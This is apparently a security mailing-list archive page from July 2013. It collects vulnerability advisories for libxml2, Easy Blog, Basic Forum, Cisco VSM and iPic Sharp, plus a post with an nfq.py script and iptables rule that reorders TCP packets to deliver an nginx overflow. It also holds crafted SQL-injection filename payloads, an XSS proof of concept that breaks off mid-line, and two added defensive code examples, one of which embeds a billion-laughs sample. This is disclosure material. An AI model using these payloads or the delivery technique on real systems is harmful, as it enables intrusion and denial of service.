[ MDVSA-2013:198 ] libxml2

2013-07-24 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2013:198
 http://www.mandriva.com/en/support/security/
 ___

 Package : libxml2
 Date: July 24, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in libxml2:
 
 A denial of service flaw was found in the way libxml2, a library
 providing support to read, modify and write XML and HTML files,
 performed string substitutions when entity value replacement for
 external entity references (--noent option) was requested /
 enabled during XML file parsing. A remote attacker could provide
 a specially-crafted XML file containing an external entity expansion
 which, when processed, would lead to excessive CPU consumption (denial of
 service) (CVE-2013-0339). This is a different flaw from CVE-2013-0338.
 
 parser.c in libxml2 before 2.9.0, as used in Google Chrome before
 28.0.1500.71 and other products, allows remote attackers to cause
 a denial of service (out-of-bounds read) via a document that ends
 abruptly, related to the lack of certain checks for the XML_PARSER_EOF
 state (CVE-2013-2877).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877
 https://bugzilla.redhat.com/show_bug.cgi?id=915149
 https://bugzilla.redhat.com/show_bug.cgi?id=983204
 http://advisories.mageia.org/MGASA-2013-0218.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 4ad243c16e07e9f6850513c57cd1aa74  mbs1/x86_64/lib64xml2_2-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 5bae4c7471edb1a4dfe267588b8f9160  mbs1/x86_64/lib64xml2-devel-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 6800af0e5ca7348bf35596e57ee0  mbs1/x86_64/libxml2-python-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 8af9449c2a438abccd86ff5d044b2e71  mbs1/x86_64/libxml2-utils-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 956fd0fbd8ccd0a705747ea469b87ff7  mbs1/SRPMS/libxml2-2.7.8-14.20120229.2.3.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
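A pre-parse check for the entity-expansion case (CVE-2013-0339) described in the advisory above, as an added example that is neither Mandriva's nor libxml2's code: it estimates how large the document body would grow if internal general entities were substituted, so an application can refuse a document before enabling --noent style expansion on untrusted input. The sample document, the 10 MB default limit and the one-character model of the predefined entities are constructed assumptions.

```python
import re
# Constructed sample: a small "billion laughs" document of the kind behind CVE-2013-0339.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
"""

_DOCTYPE = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.DOTALL)
_ENTITY = re.compile(r"""<!ENTITY\s+(\w+)\s+(?:"([^"]*)"|'([^']*)')\s*>""")
_REF = re.compile(r"&(\w+);")

def declared_entities(xml_text):
    # Internal-subset general entities plus the five predefined ones (one char each).
    ents = dict.fromkeys(("amp", "lt", "gt", "quot", "apos"), "x")
    m = _DOCTYPE.search(xml_text)
    if m:
        ents.update((n, dq or sq) for n, dq, sq in _ENTITY.findall(m.group(1)))
    return ents

def expanded_size(name, ents, memo, stack):
    # Bytes one entity becomes after full substitution; cycles and unknown names raise.
    if name in memo:
        return memo[name]
    if name in stack or name not in ents:
        raise ValueError(f"recursive or undefined entity: {name}")
    stack.add(name)
    value, size, last = ents[name], 0, 0
    for ref in _REF.finditer(value):  # literal text plus each nested reference
        size += ref.start() - last + expanded_size(ref.group(1), ents, memo, stack)
        last = ref.end()
    memo[name] = size + len(value) - last
    stack.discard(name)
    return memo[name]

def expansion_cost(xml_text):
    # Total bytes the document body would grow to if every reference were substituted.
    ents, m, memo = declared_entities(xml_text), _DOCTYPE.search(xml_text), {}
    body = xml_text[m.end():] if m else xml_text
    return sum(expanded_size(r.group(1), ents, memo, set()) for r in _REF.finditer(body))

def safe_to_substitute(xml_text, limit=10_000_000):
    # Gate to run before enabling --noent style substitution on untrusted input.
    try:
        return expansion_cost(xml_text) <= limit
    except ValueError:
        return False
```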



Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets

2013-07-24 Thread Albert Puigsech Galicia
Hello everybody,


 Ioctl is needed to set the nginx socket blocking so another call to write(2) 
 will read much more memory than it is possible with the default non-blocking 
 connection of nginx.


This vulnerability was published recently and it seems that many
exploiters got stuck because the socket will not block, because the
buffer is longer than the standard ethernet MTU; some others have
found another attack vector without that problem.

Let me explain how we have managed to overcome the non-blocking
socket impediment without doing much:


When packets arrive at the TCP layer they are analyzed and, once
the sequence is determined, immediately delivered to the upper layer
of the OSI model.

Let's imagine that you want to overflow a big buffer through the
network. Normally you would execute something like:

send(sock, A….A,…);

If the size of the data is bigger than the MTU, it is then split into
multiple packets. The destination processes the information in many
smaller packets instead of one. In summary, the read()/recv() doesn't
get all the data and the overflow is not done.

And that's what's happening on nginx.



What we have done to prevent packets from being delivered directly to
the next layer is to take advantage of TCP windows and TCP reordering:
sending the first packet in the last place.

What happens is that the TCP stack will not deliver the packets to the
next layer because the information is not complete, and just waits
until all the information (up to the size of the TCP window) is received
to deliver it.

Then the application layer will get all the information in _the same_
read and the overflow will happen.



Using that TCP trick, the size limitation of the overflow is the TCP
window size instead of the MTU.



One easy and **dirty** way to implement this is using iptables and
nfqueue, but there are some better ones:

# iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE
# python nfq.py

Regards,



===/ nfq.py /===
import nfqueue
import socket
import time

data_count = 0
delayed = None

# Callback invoked by nfqueue for every packet matched by the iptables rule.
def cb(dummy, payload):
    global data_count
    global delayed
    data = payload.get_data()
    # DIRTY for first data package (not three-way-handshake)
    if len(data) > 60:
        data_count += 1
        if (data_count == 1):
            delayed = payload
            print(data)
            # Just DROP the packet and the local TCP stack will send it again
            # because it won't get the ACK.
            payload.set_verdict(nfqueue.NF_DROP)
    else:
        data_count = 0


q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0)
try:
    q.try_run()
except KeyboardInterrupt:
    print("Exiting...")
    q.unbind(socket.AF_INET)
    q.close()
===/ nfq.py /===

On 23 July 2013 19:49, king cope
isowarez.isowarez.isowa...@googlemail.com wrote:
 (see attachment)

 /Kingcope

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



-- 
Albert Puigsech Galicia
+ Mail: alb...@puigsech.com
+ Jabber: alb...@puigsech.com
+ Twitter: @apuigsech
+ Web: file:///dev/null


Easy Blog by JM LLC - Multiple Vulnerabilities

2013-07-24 Thread Sp3ctrecore
Dear all,
I have discovered some vulnerabilities in Easy Blog, developed by JM LLC.

Cheers,
Sp3ctrecore


## ADVISORY ##


===
Easy Blog JM LLC - Multiple Vulnerabilities
===

Software: Easy Blog
Software link...: http://www.jmagness.com/download/Easy_Blog.zip
Vendor..: JM LLC
Vendor homepage.: http://www.jmagness.com

Exploit author..: Sp3ctrecore
Contact.: sp3ctrecore[at]gmail[dot]com



OVERVIEW


Easy Blog is affected by multiple vulnerabilities.


---
DISCLOSURE TIMELINE
---

04/07/2013 -- Multiple vulnerabilities discovered and reported to the vendor.
19/07/2013 -- The vendor confirmed the vulnerabilities, but has no
time to fix them.
24/07/2013 -- Public disclosure.


---
VULNERABILITIES
---

[01] SHELL UPLOAD

The image upload function in add.php allows unrestricted file upload.
An attacker may upload a shell gaining unauthorized access to the
system.


[02] MULTIPLE SQL INJECTIONS

I. add.php - filename parameter (POST request)
An attacker may upload a file with a crafted name (e.g.
file.txt',(select version()))-- -) injecting SQL code.
The content is readable in the homepage.

II. edit.php - filename parameter (POST request)
An attacker may upload a file with a crafted name (e.g.
file.txt',POST=(select version()) WHERE id=1-- -) injecting SQL
code.
The content is readable in the homepage.


[03] MULTIPLE CROSS-SITE SCRIPTING

I.   add.php - title parameter (POST request): stored XSS.
II.  add.php - keywords parameter (POST request): stored XSS.
III. add.php - description parameter (POST request): stored XSS.
IV.  add.php - slug parameter (POST request): reflected XSS.


Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager

2013-07-24 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video 
Surveillance Manager

Advisory ID: cisco-sa-20130724-vsm

Revision 1.0

For Public Release 2013 July 24 16:00 UTC (GMT)

+-

Summary
===

The Cisco Video Surveillance Manager (VSM) allows operations managers and 
system integrators to build customized video surveillance networks to meet 
their needs. Cisco VSM provides centralized configuration, management, display, 
and control of video from Cisco and third-party surveillance endpoints. 
Multiple security vulnerabilities exist in versions of Cisco VSM prior to 
7.0.0, which may allow an attacker to gain full administrative privileges on 
the system.

More information on Cisco VSM can be found at 
http://www.cisco.com/en/US/products/ps10818/index.html.

Cisco has released software updates that address these vulnerabilities. 
Workarounds that mitigate these vulnerabilities are available.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm


Basic Forum by JM LLC - Multiple Vulnerabilities

2013-07-24 Thread Sp3ctrecore
Dear all,
I have discovered some vulnerabilities in Basic Forum, developed by JM LLC.

Cheers,
Sp3ctrecore


## ADVISORY ##



Basic Forum by JM LLC - Multiple Vulnerabilities


Software: Basic Forum
Software link...: http://www.jmagness.com/download/Basic_Forum.zip
Vendor..: JM LLC
Vendor homepage.: http://www.jmagness.com

Exploit author..: Sp3ctrecore
Contact.: sp3ctrecore[at]gmail[dot]com



OVERVIEW


Basic Forum is affected by multiple vulnerabilities.


---
DISCLOSURE TIMELINE
---

04/07/2013 -- Multiple vulnerabilities discovered and reported to the vendor.
19/07/2013 -- The vendor confirmed the vulnerabilities, but has no
time to fix them.
24/07/2013 -- Public disclosure.


---
VULNERABILITIES
---

[01] MULTIPLE SQL INJECTIONS

I.   new.php - title parameter (POST request).
II.  new.php - post parameter (POST request).
III. post.php?id=1 - reply parameter (POST request).


[02] MULTIPLE CROSS-SITE SCRIPTING

I.   user.php - firstname parameter (POST request): stored XSS.
II.  user.php - bio parameter (POST request): stored XSS.
III. new.php - title parameter (POST request): stored XSS.
IV.  new.php - post parameter (POST request): stored XSS.


[03] Cross-site Request Forgery

I.   user.php - firstname parameter (POST request).
II.  user.php - email parameter (POST request).
III. user.php - password parameter (POST request).
IV.  user.php - bio parameter (POST request).
V.   new.php  - title parameter (POST request).
VI.  new.php  - post parameter (POST request).
VII. post.php - reply parameter (POST request).


iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability

2013-07-24 Thread Vulnerability Lab
Title:
==
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability


Date:
=
2013-07-24


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1031


VL-ID:
=
1031


Common Vulnerability Scoring System:

3.6


Introduction:
=
iPic Sharp Pro is a photos/video management app that can manage your photos/video 
into folders and subfolders, compress photos/folders into a zip file and extract 
photos from a compressed (zip/rar) file, use a password to protect your files, 
and transfer photos/(zip/rar) between your computer and your devices.

Password protect
Password lock entire app
Password lock wifi
Password lock individual folder

View Photos
Photo gallery
Slide show
Thumbnail preview
View Photos app

File Sharing
USB File Sharing via iTunes
Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9 
(Slide show )
Chrome and Firefox Supported upload multiple files
Email multiple files, folder Supported

Archives
Extract photos from a compressed zip/rar file
Compression files/folders to zip file
Archives rename, email, batch

( Copy of the Homepage: 
https://itunes.apple.com/en/app/ipic-sharp-pro/id449820537 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a persistent input 
validation vulnerability in the iPic Sharp v1.2.1 application (Apple iOS - iPad 
& iPhone).


Report-Timeline:

2013-07-24:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: iPic Sharp - Application 1.2.1


Exploitation-Technique:
===
Local


Severity:
=
Medium


Details:

A persistent input validation web vulnerability is detected in the iPic Sharp 
v1.2.1 application (Apple iOS - iPad & iPhone).
The bug allows an attacker (remote) to implement/inject malicious script code 
on the application side (persistent) of the device.

The vulnerability is located in the index file dir listing module of the 
web-server (http://localhost:41493) when processing locally manipulated 
`album folder names` requested via the POST method. The persistent 
script code will be executed in the main index file dir listing module when 
the service lists the newly injected malicious foldername as a separate item. 
Attackers can locally change the normal album names inside the Apple iOS 
device (iPad or iPhone) to execute the code when a user requests the 
mobile application index with the foldername listing.

Exploitation of the persistent web vulnerability requires low user interaction 
and a local privileged application & device account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account theft via persistent 
web attacks, persistent phishing or stable (persistent) certificate mail 
notification context manipulation.

Vulnerable Application(s):
[+] iPic Sharp v1.2.1 - ITunes or AppStore 
(Apple)

Vulnerable Module(s):
[+] Index

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index File Dir - Foldername Listing


Proof of Concept:
=
The persistent input validation web vulnerability can be exploited by local 
attackers with low user interaction and no privileged 
mobile web application user account. For demonstration or to reproduce ...

PoC: Root Parameter

{'isSecret':0,'isSame':1,'isDelete':0,'guid':'136'','albumtype':137,'items':[{'PhotoSharp_System_Photo':[{'name':'Camera Roll','isdir':1,'id':0,'filesize':0,'modDate':'','url':'(null)','section':'PhotoSharp_System_Photo','localsection':'System Photos','ispass':0}]},
{'PhotoSharp_Local_Photo':[{'name':'.[PERSISTENT INJECTED SCRIPT CODE!]','isdir':1,'id':0,'filesize':102,'modDate':'2013-07-20 14:50:09','url':'','section':'PhotoSharp_Local_Photo','localsection':'Local Photos','ispass':0}]},
{'PhotoSharp_Local_Document':[{'name':'PhotoSharp_Local_Document','isdir':1,'id':0,'filesize':0,'modDate':'','url':'','section':'PhotoSharp_Local_Document','localsection':'[PERSISTENT INJECTED SCRIPT CODE!]','ispass':0}]}],'dir':'','dirlocal':''}


PoC: Source

<tr><td class="photoTd" classname="photoTd"><div id="PhotoSharp_System_Photo_0" class="watermarkStart" classname="watermarkStart"><a href="javascript:loadDir('%2Fu%2FCamera%2520Roll%3FisSystem%3D1','PhotoSharp_System_Photo_0','%2Fu%2FCamera%2520Roll');"><img src="iPic%20Sharp_files/Camera%2520Roll_75_75.jpg" id="img_PhotoSharp_System_Photo_0" realurl="(null)" class="logoStart" classname="logoStart"></a><span class="spanAlbum" classname="spanAlbum">Camera Roll</span></div></td>
<td class="photoTd" classname="photoTd"><div id="PhotoSharp_Local_Photo_0" class="watermarkStart" classname="watermarkStart"><a href="javascript:loadDir('%2Fu%2F.Default%2520Album%3FisSystem%3D0','PhotoSharp_Local_Photo_0','%2Fu%2F.[PERSISTENT INJECTED SCRIPT CODE!]');"><img src="[PERSISTENT INJECTED SCRIPT
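The listing above writes raw folder names into HTML text, attribute values and an inline javascript: URL at once. As an added example that is not iPic Sharp's code, the function below builds the same album cell with the name encoded for each of those contexts and moves the click target into a data attribute; the `loadDir` argument order and the sample folder name are assumptions.

```javascript
// Added example, not iPic Sharp's code: build one album cell of the directory
// listing with the folder name encoded for every context it is placed in.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape for HTML text content and double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Path segments are percent-encoded first; the result is still HTML-escaped when
// written into an attribute, so a quote or "<" in a name cannot break out.
function albumCell(section, index, folderName) {
  const id = `${section}_${index}`;
  const dir = encodeURIComponent(`/u/${folderName}`);
  const thumb = `${encodeURIComponent(folderName)}_75_75.jpg`;
  return (
    `<td class="photoTd"><div id="${escapeHtml(id)}" class="watermarkStart">` +
    `<a href="#" data-dir="${escapeHtml(dir)}" data-target="${escapeHtml(id)}">` +
    `<img src="${escapeHtml(thumb)}" id="img_${escapeHtml(id)}" class="logoStart">` +
    `</a><span class="spanAlbum">${escapeHtml(folderName)}</span></div></td>`
  );
}

// In the page, one delegated listener replaces the inline "javascript:loadDir(...)"
// hrefs. loadDir is the app's own function seen in the listing; the (dir, id, dir)
// argument order is assumed from that source.
if (typeof document !== 'undefined') {
  document.addEventListener('click', (ev) => {
    const link = ev.target.closest('a[data-dir]');
    if (!link) return;
    ev.preventDefault();
    loadDir(link.dataset.dir, link.dataset.target, link.dataset.dir);
  });
}

// Constructed folder name of the kind the advisory describes.
const EVIL_NAME = '.<script>alert(1)</script>" onerror="alert(2)';
```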